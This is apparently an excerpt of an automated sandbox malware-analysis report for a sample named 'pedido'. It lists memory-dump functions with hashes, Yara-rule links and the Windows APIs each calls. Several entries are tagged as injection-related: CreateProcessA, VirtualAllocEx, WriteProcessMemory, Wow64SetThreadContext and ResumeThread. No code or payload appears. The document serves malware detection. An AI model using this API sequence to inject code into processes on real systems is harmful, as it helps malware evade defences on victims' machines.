Opcode ID: 0c397d1d7334a64b4d18444de59493cef981a696bd53e5efb7bbccf504a63938
Instruction ID: 37fac45a34f247f2ebc6564a9f9754504004f129e02fde2f8eda9eff0fe637d4
Opcode Fuzzy Hash: 0c397d1d7334a64b4d18444de59493cef981a696bd53e5efb7bbccf504a63938
Instruction Fuzzy Hash: C832E2B4D00619CFEB64DFA9C680A8EFBB6FF49215F55C195D448AB251CB30D982CFA0

Function 07529158 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d810eb601142548aff1c3f0fbeb652a532e4485035ce9737b8cdec4f4e6ff3c
Instruction ID: 812f017babd4f465dd4038a83095b88c52c703514862b99f6d8801659d8600f6
Opcode Fuzzy Hash: 3d810eb601142548aff1c3f0fbeb652a532e4485035ce9737b8cdec4f4e6ff3c
Instruction Fuzzy Hash: 8F5182B5D056199FDB08CFEAC9846EEFBB6FF89300F10802AE419BB254DB345946CB50

Function 07529149 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d65f0776919856ba45013d9057d23c7e04c680529d638164f99be03b0b6f17c
Instruction ID: dbf2a9d2632fa7b8d444f31e73028b215f6a8465ca560c68005602979ce1e0e8
Opcode Fuzzy Hash: 5d65f0776919856ba45013d9057d23c7e04c680529d638164f99be03b0b6f17c
Instruction Fuzzy Hash: A541B0B1E046599FDB08CFEAC9846EEFBF2BF89300F14C06AD418AB254DB345946CB40

Function 0D6A61A5 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b862d0748bcfddda46107a9bb93bf1c17a52db8c505e470c1218fcab873b3c25
Instruction ID: ee51c0d4baa565ac2f2500b856999f14d1edd479b573fe075ec20ce6f6bea872
Opcode Fuzzy Hash: b862d0748bcfddda46107a9bb93bf1c17a52db8c505e470c1218fcab873b3c25
Instruction Fuzzy Hash: 02E0393498D564CBCB12DBDCC8544F8BBBCBB8E241B08A0A6848A9B212C720CD468F20

Function 0D6A2C45 Relevance: 1.8, APIs: 1, Instructions: 250
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0D6A2E86

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7a813260a8b2d28856a77bfff5c4ac6d957b416b10eec42bb7583789d9c9801d
Instruction ID: d1227cb536bbb84f4137fb4cbe6c2edc007dcd6518aa8f17a1fab8bba609b2ff
Opcode Fuzzy Hash: 7a813260a8b2d28856a77bfff5c4ac6d957b416b10eec42bb7583789d9c9801d
Instruction Fuzzy Hash: A5A16971D4161ACFEB20DF68C8507EEBBB2FF48310F1482A9E849A7240DB759985CF95

Function 0D6A2C50 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0D6A2E86

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6ce7794c69952270c489aaeb386c020ded4daff152cb44ffd41d06ceb35c3b9a
Instruction ID: a01f53df44dda3e4ba1e28ced22603975153c5bc17b6dba00bcfcff5f508c79f
Opcode Fuzzy Hash: 6ce7794c69952270c489aaeb386c020ded4daff152cb44ffd41d06ceb35c3b9a
Instruction Fuzzy Hash: D5915971D4161ACFEB20DF68C8507EEBBB2BF48310F1482A9E849A7240DB749985CF95

Function 012FB017 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 012FB27E

Memory Dump Source

Source File: 00000000.00000002.1493760788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f0000_pedido.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cc60a7081ab2fa5dfc0d73336ac963a8cb6cdd4c9a39f260dc73c29e17940561
Instruction ID: 377032476fdd3d755d7739a337ad42c6e58ac5d6910129ac14938e3e2f886363
Opcode Fuzzy Hash: cc60a7081ab2fa5dfc0d73336ac963a8cb6cdd4c9a39f260dc73c29e17940561
Instruction Fuzzy Hash: 69815670A10B068FE724DF2AD44579BBBF5FF88200F00892DD69AD7A50DB75E945CB90

Function 012F590D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012F59C9

Memory Dump Source

Source File: 00000000.00000002.1493760788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f0000_pedido.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: baa6db5c258760f0843a57fc9846ceb9e8ef8c86507724bf76fdf31b5998cf0e
Instruction ID: 0a90a2914532dd140dc3147d9addd22799eab8b947a919df56644d5a8ef7f65d
Opcode Fuzzy Hash: baa6db5c258760f0843a57fc9846ceb9e8ef8c86507724bf76fdf31b5998cf0e
Instruction Fuzzy Hash: 3741DDB1D0071ACFDB24DFA9C884BCEFBB1BB88714F20816AD508AB254DB755949CF90

Function 012F44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012F59C9

Memory Dump Source

Source File: 00000000.00000002.1493760788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f0000_pedido.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c2ccb106c5b6ee40b68f84c88cc7996891d9965d78264316b4add9e4595d6e9b
Instruction ID: d03875db7f3772a477c83ccbbd13d1073574fe1de40f2cbeefa4e400d4e9cbd1
Opcode Fuzzy Hash: c2ccb106c5b6ee40b68f84c88cc7996891d9965d78264316b4add9e4595d6e9b
Instruction Fuzzy Hash: AD41DF70C00719CFDB24DFA9C88478EFBF1BB89714F20816AD508AB255DB755945CFA0

Function 0D6A29C0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0D6A2A58

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 68abed5c513d9788183197855e1b6b113f499ff57e9e7d10d946190b9fe99525
Instruction ID: defc6a30082f718754bc866ad101ab0395a90f45b7c96fa534b6f1f80a4beaf5
Opcode Fuzzy Hash: 68abed5c513d9788183197855e1b6b113f499ff57e9e7d10d946190b9fe99525
Instruction Fuzzy Hash: F52146759003499FDB10CFAAC881BEEBBF5FF48310F10852AE958A7240C7799954CFA4

Function 0D6A29C8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0D6A2A58

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 96f95dbf61df01deb90886aaef284b4a281c731180ad85c73b6067f5647f2e5c
Instruction ID: 1ace212af2551ce8abd9af4e558d19773801456adffacbeea0b52231b653276a
Opcode Fuzzy Hash: 96f95dbf61df01deb90886aaef284b4a281c731180ad85c73b6067f5647f2e5c
Instruction Fuzzy Hash: 692124759003499FDB10DFAAC881BEEBBF5FF48310F10842AE958A7240C7789944CFA4

Function 0D6A2828 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0D6A28AE

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a4879ab48f85e434df1762b6721412e9703617217be1f2b68f2d7801c9615220
Instruction ID: a9803cdbbf9b3a3883909f5692b7f271c487253911edd7a6531baf85ee6b6d2b
Opcode Fuzzy Hash: a4879ab48f85e434df1762b6721412e9703617217be1f2b68f2d7801c9615220
Instruction Fuzzy Hash: 2C2159759003099FDB14DFAAC8817EEBBF4AF88720F14842AE559A7340CB789945CFA4

Function 0D6A2AB0 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0D6A2B38

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 27e6b69492758e2092bd99f11f22f39b9bd4c81523ead38be2412a5493fce1b5
Instruction ID: f4ef51e5df11140a2799181269720ed5133a7291a2a70dc1c6af604b6faee3cb
Opcode Fuzzy Hash: 27e6b69492758e2092bd99f11f22f39b9bd4c81523ead38be2412a5493fce1b5
Instruction Fuzzy Hash: D72127758003499FDB10DFAAC881BEEBBF5FF48310F50842AE519A7240C77899418FA4

Function 012FBDA0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012FD8D6,?,?,?,?,?), ref: 012FD997

Memory Dump Source

Source File: 00000000.00000002.1493760788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f0000_pedido.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1c92d10f10bbd95054293ff279b870a2c2b248966c8c66be0134307ee7fee9e6
Instruction ID: e7b0fd07fd6e71ddf1819a2b8d003849c83885ef3660f55a69558ad293344a2a
Opcode Fuzzy Hash: 1c92d10f10bbd95054293ff279b870a2c2b248966c8c66be0134307ee7fee9e6
Instruction Fuzzy Hash: FE21E5B590020D9FDB10CF9AD884ADEFBF5EB48710F14841AEA14A7350D375A950CFA5

Function 0D6A2830 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0D6A28AE

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4178b7deacfd7860ea5ad797b070cc9af0e46c70dd41e9a88791e9fe62d9966e
Instruction ID: 33b0f63fe66baa84886deadcdcf6df3321a33f1259c754ad415689e2408fcc0a
Opcode Fuzzy Hash: 4178b7deacfd7860ea5ad797b070cc9af0e46c70dd41e9a88791e9fe62d9966e
Instruction Fuzzy Hash: 38213871D003098FDB14DFAAC4857AEBBF4AF88710F148429D559A7340CB789944CFA4

Function 0D6A2AB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0D6A2B38

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 15b5b546a871d8c2a4d796be0548b8531eb65bb97ffb61de23d9adf70e7ae82f
Instruction ID: 18b34529000aa4f4ae09e5230b6f2283958558518212ea5893bf985c2596cb99
Opcode Fuzzy Hash: 15b5b546a871d8c2a4d796be0548b8531eb65bb97ffb61de23d9adf70e7ae82f
Instruction Fuzzy Hash: 9F2114718003499FDB10DFAAC880BEEFBF5FF48310F50842AE959A7240C7789900DBA4

Function 012FD909 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012FD8D6,?,?,?,?,?), ref: 012FD997

Memory Dump Source

Source File: 00000000.00000002.1493760788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f0000_pedido.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dbee4ab87460e09426f9b84b22e60f8e4fc8b4560d5b7a6614ceed77847adae4
Instruction ID: f8a53946fcbd9996a687791651311ede2e1c1075c8dfece8b93f6af53db08145
Opcode Fuzzy Hash: dbee4ab87460e09426f9b84b22e60f8e4fc8b4560d5b7a6614ceed77847adae4
Instruction Fuzzy Hash: D121E3B5900209DFDB10CFAAD984AEEBBF9EB48320F14841AE954A3350D378A940CF61

Function 0D6A2903 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0D6A2976

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9ae1224a540d50ee05ee73037be18ce60a29fb1ae533e1a13b750f7c0808c369
Instruction ID: 7a33888f4df967fabbbf058b956d0aae486fd08f782a9be67f388c3c563eae24
Opcode Fuzzy Hash: 9ae1224a540d50ee05ee73037be18ce60a29fb1ae533e1a13b750f7c0808c369
Instruction Fuzzy Hash: 151164768003099FDB10DFAAC845BEEBBF5AB88720F10841AE555A7650CB75A940CFA1

Function 07526AC0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 07526B38

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: b01d9e72a17eb8dc5224d090bed30a96fa5e9a9c8e188ef4f4584e33ec45d316
Instruction ID: 6d274ae45c9f52e52d41320b53b32a9d0e41bd26d4325c336ac836e9d495158e
Opcode Fuzzy Hash: b01d9e72a17eb8dc5224d090bed30a96fa5e9a9c8e188ef4f4584e33ec45d316
Instruction Fuzzy Hash: FE1142B5C0061A9FCB14CF9AD844ADEFBF4FB49720F10821AD818A7640C774A941CFA1

Function 07525D94 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 07526B38

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 9670bd321de77f82cfd645c5fe01f317557b78731ad5368f6e6fc5034ca9df8d
Instruction ID: 13b2d44728a6ea519a876575dfb562a811815149cc318fb79e11ecc50baa1df4
Opcode Fuzzy Hash: 9670bd321de77f82cfd645c5fe01f317557b78731ad5368f6e6fc5034ca9df8d
Instruction Fuzzy Hash: 391142B1D0061AABCB14DF9AD844BDEFBF4FB49720F10811AD818A3680C774A905CFA0

Function 0D6A2908 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0D6A2976

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 452bbfb73e91e3d8983c7ecbf8ef6c4e40c87c2a945f5c30015da25d60a4273b
Instruction ID: 59db69b7c8265299c8fcf9a67274015a889f489d4a8faa9108bc6b4de918384a
Opcode Fuzzy Hash: 452bbfb73e91e3d8983c7ecbf8ef6c4e40c87c2a945f5c30015da25d60a4273b
Instruction Fuzzy Hash: F01167758003498FDB10DFAAC844BDFBBF5EF88720F148419E555A7250C7759900CFA0

Function 0D6A277B Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0D6A27E2

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a99323bba6b7a27a8d9fe891fb873a2070363b7f10893fcc9e838ee6702259ec
Instruction ID: bf7c26df71a4de456e597f4c29de825073907cbe2d7b3152fb73e837df4ba9e2
Opcode Fuzzy Hash: a99323bba6b7a27a8d9fe891fb873a2070363b7f10893fcc9e838ee6702259ec
Instruction Fuzzy Hash: 8C1146759003498FDB24DFAAC8457EEBBF8AB88620F10841AD519A7240CB75A944CFA4

Function 0D6A2718 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0D6A27E2

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: bda910c28de4074bd9e1d3d77a49db45e38d13cd6d96e9fc1975b90c4704777f
Instruction ID: fcc6beecdee1fbf8a0cb0d0ef22535c16720751ee6c23fef980d5136d4f17fdd
Opcode Fuzzy Hash: bda910c28de4074bd9e1d3d77a49db45e38d13cd6d96e9fc1975b90c4704777f
Instruction Fuzzy Hash: 91116AB59003498FDB10DFAAC4447EEFBF5AF88310F208419D459A7340CB759940CFA4

Function 0D6A2780 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0D6A27E2

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1ca7cc75227def806ee3b53daca8245146c17773524514522e4caa5ba70c83dc
Instruction ID: e8159b736fd9740bcd32bc97ebbd86449b7ae602784bd2b3aa4bfb6f5294cb60
Opcode Fuzzy Hash: 1ca7cc75227def806ee3b53daca8245146c17773524514522e4caa5ba70c83dc
Instruction Fuzzy Hash: A11158759003498FDB10DFAAC84479EFBF4AF88620F108419D519A7240CB75A900CFA4

Function 012FB218 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 012FB27E

Memory Dump Source

Source File: 00000000.00000002.1493760788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f0000_pedido.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e6a702e962094386e356a9bc8372e2e571a1b0f2cfeee7bb01334a14506f8c74
Instruction ID: d4d96a63f8c035493650afdc0929aebbff4a8c08f971b62c2e9410592daca2c7
Opcode Fuzzy Hash: e6a702e962094386e356a9bc8372e2e571a1b0f2cfeee7bb01334a14506f8c74
Instruction Fuzzy Hash: A91113B5C003498FDB10CF9AC444BDEFBF4EB88710F10842AD518A7210C379A545CFA1

Function 0D6A0CF0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0D6A6F75

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ef8caa51bb032bb3dc457db98e6a7bc6ca45a66cc0171ef7ad7c90f14406e958
Instruction ID: 46e9b162b59a976fa886cccd91f5badd7bb89c23585b36b5431baba12d1d8943
Opcode Fuzzy Hash: ef8caa51bb032bb3dc457db98e6a7bc6ca45a66cc0171ef7ad7c90f14406e958
Instruction Fuzzy Hash: 1F11F2B58047499FDB10DF9AD884BEEFBF8EB48320F14841AE958A7650C375A944CFA1

Function 0D6A6F11 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0D6A6F75

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b05886451a606899df698aac8e967c7d508cec63c8b9a73e0d9d83e3f77c2677
Instruction ID: 9397380b1eb996617741394fcb01b33323c4ac2ce7d5dfade7c6018956616a8a
Opcode Fuzzy Hash: b05886451a606899df698aac8e967c7d508cec63c8b9a73e0d9d83e3f77c2677
Instruction Fuzzy Hash: 8911F5B58003499FDB20DF9AD845BDEBBF8EB48320F108419E554A7610C375A944CFA1

Function 0D6A2901 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0D6A2976

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7866901a8ca3723f8036288123063e58b54b5b57eafeed654cbde20f58b7e3b5
Instruction ID: 3ad53b94a73f5241d61b8265a6a125aba15503907bca4c36d687de7849409923
Opcode Fuzzy Hash: 7866901a8ca3723f8036288123063e58b54b5b57eafeed654cbde20f58b7e3b5
Instruction Fuzzy Hash: 3FE02B365007098FDB10E7ADD4543DEF7E4AF88320F34C40AC09A93691C7799841CB50

Function 0D6A2779 Relevance: 1.5, APIs: 1, Instructions: 22threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0D6A27E2

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: bb4e36898c71119f27cbd237cf87f2111974eb83fe13a38e8a76a744acb3eb22
Instruction ID: 896417ae85522ef3e3f02ce2d93492579041cc59e4f4956882ca96ddedd1d7d0
Opcode Fuzzy Hash: bb4e36898c71119f27cbd237cf87f2111974eb83fe13a38e8a76a744acb3eb22
Instruction Fuzzy Hash: ADE04F369406098BDB20EBADD8543DEF7E9AF88225F24841AC159A3250CB799945CF90

Function 07526B70 Relevance: 1.3, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 07526BD7

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0ee5d3a9f4805e7128e6d5e10449a11aba3bc0e77da7857ccee40e0e316a54bf
Instruction ID: bd97d77eb8ebd4c3053c7edee1f3ac3aef074c26aaa8e979326e08d2069b34d2
Opcode Fuzzy Hash: 0ee5d3a9f4805e7128e6d5e10449a11aba3bc0e77da7857ccee40e0e316a54bf
Instruction Fuzzy Hash: 411158B18003598FDB10DF9AD845BDEFBF4EB48320F10841AD558A3681C778A984CFA1

Function 07525DA0 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 07526BD7

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1afe32a980f6ddaf13bd32448bb6d98443a50fd13c4e8027636a78b7be794537
Instruction ID: e529e5d35966e7dd161cce71996eeb348d370b0124afb370ba47a43fec9a8eab
Opcode Fuzzy Hash: 1afe32a980f6ddaf13bd32448bb6d98443a50fd13c4e8027636a78b7be794537
Instruction Fuzzy Hash: DB1125B19043598FDB10DF9AC844BEEBBF4FB49320F10842AD518A7680D778A944CFA5

Function 05A7F770 Relevance: .7, Instructions: 688COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f98e31c143cbda5ea6a0e8248b43153f1a26af64113748170469d069811c3dce
Instruction ID: 85f0bbef0372e7587ba6965fbdd15db9df7625c6f18fac951d4045fded36acb7
Opcode Fuzzy Hash: f98e31c143cbda5ea6a0e8248b43153f1a26af64113748170469d069811c3dce
Instruction Fuzzy Hash: 2D42C271A042099FDB15CF69C854EBEBBB6FF89300F14846AE816DB391DB35DA41CB90

Function 05A7D4A0 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdf374ac193ac6847685ce074eec9b2989d5b193094a79d5369acf6300abf7ea
Instruction ID: edda8a3478b718bae5a76a0051c33fa001ec2cca1725405119492724770b3b3b
Opcode Fuzzy Hash: bdf374ac193ac6847685ce074eec9b2989d5b193094a79d5369acf6300abf7ea
Instruction Fuzzy Hash: 0E125D30A042089FCB14DF69D984EAEBBF2FF88315F158599E85ADB2A1D731ED41CB50

